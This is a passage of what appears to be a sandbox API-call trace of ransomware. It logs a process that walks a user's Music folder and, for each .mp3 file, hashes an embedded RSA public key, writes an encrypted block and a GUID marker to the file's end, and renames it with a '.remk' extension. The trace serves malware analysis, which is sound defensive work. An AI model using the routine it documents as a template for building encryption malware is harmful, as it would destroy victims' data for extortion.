Size=0xb0) returned 0x3185c10 [0235.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x37bd408 [0235.535] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\P0oF.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\p0of.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\P0oF.mp3.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\p0of.mp3.remk")) returned 1 [0235.537] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x637d4b60, ftCreationTime.dwHighDateTime=0x1d5e69c, ftLastAccessTime.dwLowDateTime=0x692d7a50, ftLastAccessTime.dwHighDateTime=0x1d5e76c, ftLastWriteTime.dwLowDateTime=0x692d7a50, ftLastWriteTime.dwHighDateTime=0x1d5e76c, nFileSizeHigh=0x0, nFileSizeLow=0xa76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PlRTanSu8y.mp3", cAlternateFileName="PLRTAN~1.MP3")) returned 1 [0235.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xee) returned 0x31a4298 [0235.537] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\PlRTanSu8y.mp3") returned=".mp3" [0235.537] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\PlRTanSu8y.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\plrtansu8y.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.538] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=2678) returned 1 [0235.538] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.540] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xa50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.541] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.543] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xa76, lpOverlapped=0x0) returned 1 [0235.543] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.543] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.543] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.543] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0235.544] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.544] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.544] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.544] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.544] GetLastError () returned 0x0 [0235.544] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.544] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0235.545] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.545] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.545] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.545] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.545] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xa76, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.545] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.546] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.546] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.546] CloseHandle (hObject=0x640) returned 1 [0235.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0235.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x37bd408 [0235.547] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\PlRTanSu8y.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\plrtansu8y.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\PlRTanSu8y.mp3.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\plrtansu8y.mp3.remk")) returned 1 [0235.549] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f8a7da0, ftCreationTime.dwHighDateTime=0x1d5e1a4, ftLastAccessTime.dwLowDateTime=0xdaa71850, ftLastAccessTime.dwHighDateTime=0x1d5e035, ftLastWriteTime.dwLowDateTime=0xdaa71850, ftLastWriteTime.dwHighDateTime=0x1d5e035, nFileSizeHigh=0x0, nFileSizeLow=0x573f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="q4aLH-FAjevoeH6I.mp3", cAlternateFileName="Q4ALH-~1.MP3")) returned 1 [0235.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xee) returned 0x31a4298 [0235.549] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\q4aLH-FAjevoeH6I.mp3") returned=".mp3" [0235.549] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\q4aLH-FAjevoeH6I.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\q4alh-fajevoeh6i.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.549] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=22335) returned 1 [0235.549] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.552] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x5719, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.552] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.554] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x573f, lpOverlapped=0x0) returned 1 [0235.555] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.555] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.555] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.556] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0235.557] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.557] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.557] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.557] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.557] GetLastError () returned 0x0 [0235.557] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.557] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0235.557] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.557] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.557] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.557] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.558] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.558] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x573f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.558] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.558] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.558] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.558] CloseHandle (hObject=0x640) returned 1 [0235.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x31891a0 [0235.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x37bd408 [0235.563] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\q4aLH-FAjevoeH6I.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\q4alh-fajevoeh6i.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Xb4anhaDsw_nEnBFeS\\-wYl9Wxaf_FQLu8dRQB5\\q4aLH-FAjevoeH6I.mp3.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xb4anhadsw_nenbfes\\-wyl9wxaf_fqlu8drqb5\\q4alh-fajevoeh6i.mp3.remk")) returned 1 [0235.565] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f8a7da0, ftCreationTime.dwHighDateTime=0x1d5e1a4, ftLastAccessTime.dwLowDateTime=0xdaa71850, ftLastAccessTime.dwHighDateTime=0x1d5e035, ftLastWriteTime.dwLowDateTime=0xdaa71850, ftLastWriteTime.dwHighDateTime=0x1d5e035, nFileSizeHigh=0x0, nFileSizeLow=0x573f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="q4aLH-FAjevoeH6I.mp3", cAlternateFileName="Q4ALH-~1.MP3")) returned 0 [0235.565] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0235.565] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0235.565] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6768 | out: hHeap=0x630000) returned 1 [0235.565] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0235.565] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6768 [0235.565] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0235.565] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.565] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.565] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.565] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.565] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.565] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.566] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.566] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.566] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.566] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.566] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.566] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.566] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.566] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.566] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.566] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0235.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.568] RtlAllocateHeap 